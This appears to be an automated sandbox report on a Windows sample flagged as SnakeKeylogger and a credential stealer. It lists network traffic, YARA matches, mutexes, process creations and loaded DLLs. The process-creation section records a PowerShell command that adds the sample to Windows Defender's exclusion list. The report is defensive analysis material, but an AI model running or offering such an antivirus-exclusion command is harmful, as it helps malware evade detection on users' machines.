                    Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50231 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50229 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Window created: window name: CLIPBRDWNDCLASS

                    System Summary

                    Source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                    Source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
                    Source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: Process Memory Space: Yef4EqsQha.exe PID: 7640, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: Process Memory Space: Yef4EqsQha.exe PID: 7872, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Process Stats: CPU usage > 49%
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000000.00000002.1389923913.0000000002B5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000000.00000002.1395225063.0000000007480000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000000.00000002.1396378200.0000000008C90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000000.00000002.1384875417.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000000.00000000.1369273436.00000000007D6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUIQk.exeJ vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000006.00000002.3829533118.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000006.00000002.3843065148.0000000006A99000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exeBinary or memory string: OriginalFilenameUIQk.exeJ vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Yef4EqsQha.exe PID: 7640, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Yef4EqsQha.exe PID: 7872, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Yef4EqsQha.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/8@5/3
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Yef4EqsQha.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMutant created: \Sessions\1\BaseNamedObjects\Xqxqbe
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cvnqseku.25h.ps1Jump to behavior
                    Source: Yef4EqsQha.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Yef4EqsQha.exeReversingLabs: Detection: 82%
                    Source: Yef4EqsQha.exeVirustotal: Detection: 70%
                    Source: unknownProcess created: C:\Users\user\Desktop\Yef4EqsQha.exe "C:\Users\user\Desktop\Yef4EqsQha.exe"
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Yef4EqsQha.exe"
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess created: C:\Users\user\Desktop\Yef4EqsQha.exe "C:\Users\user\Desktop\Yef4EqsQha.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess created: C:\Users\user\Desktop\Yef4EqsQha.exe "C:\Users\user\Desktop\Yef4EqsQha.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
